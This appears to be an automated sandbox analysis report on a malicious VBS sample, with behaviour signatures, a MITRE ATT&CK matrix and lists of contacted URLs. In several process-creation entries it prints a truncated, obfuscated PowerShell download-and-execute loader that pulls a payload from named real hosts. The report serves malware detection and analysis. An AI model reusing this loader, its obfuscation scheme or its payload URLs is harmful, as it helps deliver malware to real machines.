            Source: wscript.exe, 00000000.00000002.1705458139.000002343CD95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_1732.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTR
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$polars229='afkvistning158';;$navier='kompetencegivende';;$ndudgangen9='semipreserved';;$straalepletten='knaldgassen';;$forhales=$host.name;function tilbageholdte($satirisation){if ($forhales) {$nonanarchically=2} for ($jurywoman=$nonanarchically;;$jurywoman+=3){if(!$satirisation[$jurywoman]){cls;break }$halomancy+=$satirisation[$jurywoman];$hiveward='schweizerostens'}$halomancy}function containeriseringers($taltes213){ .($murage) ($taltes213)}$plagen=tilbageholdte ' snree gt c. uw';$plagen+=tilbageholdte ' ae ab.lc.ule i eesin at';$moonscape=tilbageholdte 'b,mcoo,tz,hi sl,al cao /';$elegiker=tilbageholdte ' at tlflsto1fo2';$ungeneral='ar[t.npuem tm .bisdue rfev itrc oepap.ponaisunists.mriaamnbua nghaesdr m]kn:so:stsc esecfau yr ai uta,y rpalrmaou t okockootal,u=pe$ eeb.ls eflg oiomk bebir';$moonscape+=tilbageholdte 'mo5gu. u0la g( lw vikrnt d okawcosvi o.nhetre i1ae0 r.ap0sl;st ,ew si .nh 6bo4dr; u ,ix i6 h4o,;ke lur rva :pi1l 3fo1va.bu0ab) d ,gbae cdekhao /tr2va0re1e.0an0 m1as0ne1 l tifsei mrneesef codrx o/r 1cy3 t1.o.so0';$retransform=tilbageholdte ' fut sc,eteris-ska ag,eeren ct';$automatteoriens=tilbageholdte 'ruhsath.tspp jse :qu/ e/t w tw owkr. vfvitgasmae n gkris ntreste rl.str. ac rot.mf /rekspmg./remlyimecnarp.ohocovhthedri slreiw a l.sid kw.rp q> jh lt it.opevsfo:hy/ e/n w cwskwfu. opafu bn es.e itfa.tra eesl/hykrumga/ vme,ihuc crsmog cdrh .e hipalk iwaac,. rd w op';$sterne=tilbageholdte 'bi>';$murage=tilbageholdte 'beieaefrx';$svejsemestre='teddybjrnenes';$groteskes='\bethink.sal';containeriseringers (tilbageholdte 'k.$fogudl io.ebroa,mlk,:seecan herib rrh rchi scuedinaleh ssa=af$ .eflntrv i: fa upanp d.eamet akr+s,$kng cr,dok true osrek e.as');containeriseringers (tilbageholdte 'sc$ovg .ltho ,b eavrlsa:viluna,ngrer ci.rn.pg ssarfblo trs m .3re7go=e $ .a.juflt o om ha etlat.oethoc r pispefon rs a.klsn punl ri stho(sl$pesjet earrg n yemu)');containeriseringers (tilbageholdte $ungeneral);$automatteoriens=$lagringsform37[0];$bygders=(tilbageholdte ' p$brgt ls o sb.uac l : pbamis,rskgboisptquth ihjn merarfre bnsks .=f.nfief wst-smopebgyj behock,t us.nyjosstt ger m k.l $sap dlbial.g econ');containeriseringers ($bygders);containeriseringers (tilbageholdte '.o$prbpeicord gpri ftj.t .i sn hesorereannkus i.orhudearamid,eerarkosca[po$strheeg.tsar oa,insrsshfk.of rprms ]fa=gr$jemsto eoovnpas,dckua gpsie');$netmave=tilbageholdte ' s$ .bgoif.rreg,ai at dt si ,nn e mrs ehjns,s . .dbooflwb nudl oolrapedcafb itrlc e h(dr$aaa au ntprounmseamittots ediokor ireeanna,sri, $ vihunmaddioirpath yeornuni cnep)';$indophenin=$enebrrisenes;containeriseringers (tilbageholdte 't $,ngm.lstofeb ca.ol e:ini dnfuggoet f mr dm iab.rspmcoef lafab dgee o= f(.yt ee asbat f-atp,aa ,t ah i y$uni knchd .o ,punhude ,n ki ,nbe)');while (!$ingefrmarmelade) {containeriseringers (tilbageholdte ' e$ ig slbuobrbspa albl:m dfiedonnonlo
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$polars229='afkvistning158';;$navier='kompetencegivende';;$ndudgangen9='semipreserved';;$straalepletten='knaldgassen';;$forhales=$host.name;function tilbageholdte($satirisation){if ($forhales) {$nonanarchically=2} for ($jurywoman=$nonanarchically;;$jurywoman+=3){if(!$satirisation[$jurywoman]){cls;break }$halomancy+=$satirisation[$jurywoman];$hiveward='schweizerostens'}$halomancy}function containeriseringers($taltes213){ .($murage) ($taltes213)}$plagen=tilbageholdte ' snree gt c. uw';$plagen+=tilbageholdte ' ae ab.lc.ule i eesin at';$moonscape=tilbageholdte 'b,mcoo,tz,hi sl,al cao /';$elegiker=tilbageholdte ' at tlflsto1fo2';$ungeneral='ar[t.npuem tm .bisdue rfev itrc oepap.ponaisunists.mriaamnbua nghaesdr m]kn:so:stsc esecfau yr ai uta,y rpalrmaou t okockootal,u=pe$ eeb.ls eflg oiomk bebir';$moonscape+=tilbageholdte 'mo5gu. u0la g( lw vikrnt d okawcosvi o.nhetre i1ae0 r.ap0sl;st ,ew si .nh 6bo4dr; u ,ix i6 h4o,;ke lur rva :pi1l 3fo1va.bu0ab) d ,gbae cdekhao /tr2va0re1e.0an0 m1as0ne1 l tifsei mrneesef codrx o/r 1cy3 t1.o.so0';$retransform=tilbageholdte ' fut sc,eteris-ska ag,eeren ct';$automatteoriens=tilbageholdte 'ruhsath.tspp jse :qu/ e/t w tw owkr. vfvitgasmae n gkris ntreste rl.str. ac rot.mf /rekspmg./remlyimecnarp.ohocovhthedri slreiw a l.sid kw.rp q> jh lt it.opevsfo:hy/ e/n w cwskwfu. opafu bn es.e itfa.tra eesl/hykrumga/ vme,ihuc crsmog cdrh .e hipalk iwaac,. rd w op';$sterne=tilbageholdte 'bi>';$murage=tilbageholdte 'beieaefrx';$svejsemestre='teddybjrnenes';$groteskes='\bethink.sal';containeriseringers (tilbageholdte 'k.$fogudl io.ebroa,mlk,:seecan herib rrh rchi scuedinaleh ssa=af$ .eflntrv i: fa upanp d.eamet akr+s,$kng cr,dok true osrek e.as');containeriseringers (tilbageholdte 'sc$ovg .ltho ,b eavrlsa:viluna,ngrer ci.rn.pg ssarfblo trs m .3re7go=e $ .a.juflt o om ha etlat.oethoc r pispefon rs a.klsn punl ri stho(sl$pesjet earrg n yemu)');containeriseringers (tilbageholdte $ungeneral);$automatteoriens=$lagringsform37[0];$bygders=(tilbageholdte ' p$brgt ls o sb.uac l : pbamis,rskgboisptquth ihjn merarfre bnsks .=f.nfief wst-smopebgyj behock,t us.nyjosstt ger m k.l $sap dlbial.g econ');containeriseringers ($bygders);containeriseringers (tilbageholdte '.o$prbpeicord gpri ftj.t .i sn hesorereannkus i.orhudearamid,eerarkosca[po$strheeg.tsar oa,insrsshfk.of rprms ]fa=gr$jemsto eoovnpas,dckua gpsie');$netmave=tilbageholdte ' s$ .bgoif.rreg,ai at dt si ,nn e mrs ehjns,s . .dbooflwb nudl oolrapedcafb itrlc e h(dr$aaa au ntprounmseamittots ediokor ireeanna,sri, $ vihunmaddioirpath yeornuni cnep)';$indophenin=$enebrrisenes;containeriseringers (tilbageholdte 't $,ngm.lstofeb ca.ol e:ini dnfuggoet f mr dm iab.rspmcoef lafab dgee o= f(.yt ee asbat f-atp,aa ,t ah i y$uni knchd .o ,punhude ,n ki ,nbe)');while (!$ingefrmarmelade) {containeriseringers (tilbageholdte ' e$ ig slbuobrbspa albl:m dfiedonnonlo
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$polars229='afkvistning158';;$navier='kompetencegivende';;$ndudgangen9='semipreserved';;$straalepletten='knaldgassen';;$forhales=$host.name;function tilbageholdte($satirisation){if ($forhales) {$nonanarchically=2} for ($jurywoman=$nonanarchically;;$jurywoman+=3){if(!$satirisation[$jurywoman]){cls;break }$halomancy+=$satirisation[$jurywoman];$hiveward='schweizerostens'}$halomancy}function containeriseringers($taltes213){ .($murage) ($taltes213)}$plagen=tilbageholdte ' snree gt c. uw';$plagen+=tilbageholdte ' ae ab.lc.ule i eesin at';$moonscape=tilbageholdte 'b,mcoo,tz,hi sl,al cao /';$elegiker=tilbageholdte ' at tlflsto1fo2';$ungeneral='ar[t.npuem tm .bisdue rfev itrc oepap.ponaisunists.mriaamnbua nghaesdr m]kn:so:stsc esecfau yr ai uta,y rpalrmaou t okockootal,u=pe$ eeb.ls eflg oiomk bebir';$moonscape+=tilbageholdte 'mo5gu. u0la g( lw vikrnt d okawcosvi o.nhetre i1ae0 r.ap0sl;st ,ew si .nh 6bo4dr; u ,ix i6 h4o,;ke lur rva :pi1l 3fo1va.bu0ab) d ,gbae cdekhao /tr2va0re1e.0an0 m1as0ne1 l tifsei mrneesef codrx o/r 1cy3 t1.o.so0';$retransform=tilbageholdte ' fut sc,eteris-ska ag,eeren ct';$automatteoriens=tilbageholdte 'ruhsath.tspp jse :qu/ e/t w tw owkr. vfvitgasmae n gkris ntreste rl.str. ac rot.mf /rekspmg./remlyimecnarp.ohocovhthedri slreiw a l.sid kw.rp q> jh lt it.opevsfo:hy/ e/n w cwskwfu. opafu bn es.e itfa.tra eesl/hykrumga/ vme,ihuc crsmog cdrh .e hipalk iwaac,. rd w op';$sterne=tilbageholdte 'bi>';$murage=tilbageholdte 'beieaefrx';$svejsemestre='teddybjrnenes';$groteskes='\bethink.sal';containeriseringers (tilbageholdte 'k.$fogudl io.ebroa,mlk,:seecan herib rrh rchi scuedinaleh ssa=af$ .eflntrv i: fa upanp d.eamet akr+s,$kng cr,dok true osrek e.as');containeriseringers (tilbageholdte 'sc$ovg .ltho ,b eavrlsa:viluna,ngrer ci.rn.pg ssarfblo trs m .3re7go=e $ .a.juflt o om ha etlat.oethoc r pispefon rs a.klsn punl ri stho(sl$pesjet earrg n yemu)');containeriseringers (tilbageholdte $ungeneral);$automatteoriens=$lagringsform37[0];$bygders=(tilbageholdte ' p$brgt ls o sb.uac l : pbamis,rskgboisptquth ihjn merarfre bnsks .=f.nfief wst-smopebgyj behock,t us.nyjosstt ger m k.l $sap dlbial.g econ');containeriseringers ($bygders);containeriseringers (tilbageholdte '.o$prbpeicord gpri ftj.t .i sn hesorereannkus i.orhudearamid,eerarkosca[po$strheeg.tsar oa,insrsshfk.of rprms ]fa=gr$jemsto eoovnpas,dckua gpsie');$netmave=tilbageholdte ' s$ .bgoif.rreg,ai at dt si ,nn e mrs ehjns,s . .dbooflwb nudl oolrapedcafb itrlc e h(dr$aaa au ntprounmseamittots ediokor ireeanna,sri, $ vihunmaddioirpath yeornuni cnep)';$indophenin=$enebrrisenes;containeriseringers (tilbageholdte 't $,ngm.lstofeb ca.ol e:ini dnfuggoet f mr dm iab.rspmcoef lafab dgee o= f(.yt ee asbat f-atp,aa ,t ah i y$uni knchd .o ,punhude ,n ki ,nbe)');while (!$ingefrmarmelade) {containeriseringers (tilbageholdte ' e$ ig slbuobrbspa albl:m dfiedonnonloJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		221
            Scripting            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping11
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		121
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution            		Logon Script (Windows)Logon Script (Windows)11
            Process Injection            		Security Account Manager121
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook2
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            S1a5ZF3ytp.vbs8%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.ftsengineers.com0%Avira URL Cloudsafe
            https://www.ftsengineers.com0%Avira URL Cloudsafe
            https://www.puneet.ae/km/microcheilia.dwp0%Avira URL Cloudsafe
            http://crl.micro_0%Avira URL Cloudsafe
            https://www.ftsengineers.com/km/microcheilia.dwp0%Avira URL Cloudsafe
            http://ftsengineers.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ftsengineers.com
            		103.53.42.63
            		truefalse
              		unknown
              www.ftsengineers.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://www.ftsengineers.com/km/microcheilia.dwpfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.ftsengineers.compowershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.ftsengineers.compowershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9AFD3000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.microsoft.copowershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://ftsengineers.compowershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.puneet.ae/km/microcheilia.dwppowershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.micro_powershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
